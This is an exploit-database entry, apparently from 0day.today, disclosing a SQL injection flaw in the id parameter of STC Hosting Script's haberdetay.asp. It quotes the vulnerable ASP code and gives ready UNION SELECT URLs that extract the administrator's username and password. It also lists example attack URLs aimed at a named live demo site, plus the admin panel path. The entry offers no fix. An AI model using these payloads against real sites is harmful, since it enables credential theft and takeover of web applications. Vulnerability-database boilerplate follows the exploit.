Lucene search
K

STC Hosting Script (id) Remote SQL Injection Vulnerability

🗓️ 15 Aug 2010 00:00:00Reported by KnocKoutType 
zdt
 zdt
🔗 0day.today👁 33 Views

STC Hosting Script Remote SQL Injection Vulnerabilit

Code
==========================================================
STC Hosting Script (id) Remote SQL Injection Vulnerability
==========================================================

########################################################
Author : KnocKout
Thankz.: DaiMon,Equivalent
Contact: [email protected]
#########################################################
Script Name : STC Hosting Script
Script Download : http://aspindir.com/goster/6064
Vulnerable Style : SQL Injection
########################################################

Vulnerable file in haberdetay.asp

#############Error Code###############################

<!-- #include file="baglan.asp"-->
<%
id = Request.QueryString("id")
Set haberdetay = Server.CreateObject("Adodb.recordset")
Sql= "Select * From haberler where id="&id
haberdetay.open sql,Fatih,1,3
%>

<%=haberdetay("icerik")%>
<title><%=haberdetay("baslik")%></title>

####################################################
!
Inj3ct Code : -1%20union%20select%200,1,2,[DATA]%20from%20{TABLE]%20where+id=1
!
(Admin username): http://target/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_adi%20from%20ayarlar%20where+id=1
(Admin password): http://target/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_sifre%20from%20ayarlar%20where+id=1
?
!
Example Attack : 
http://www.sanalturkey.com/demo/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_adi%20from%20ayarlar%20where+id=1
http://www.sanalturkey.com/demo/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_sifre%20from%20ayarlar%20where+id=1

Admin Path : http://target/yonetici
####################################################
Special Thanks Inj3ct0r Exploit DataBase
I Love you Inj3ct0r.Com



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1
33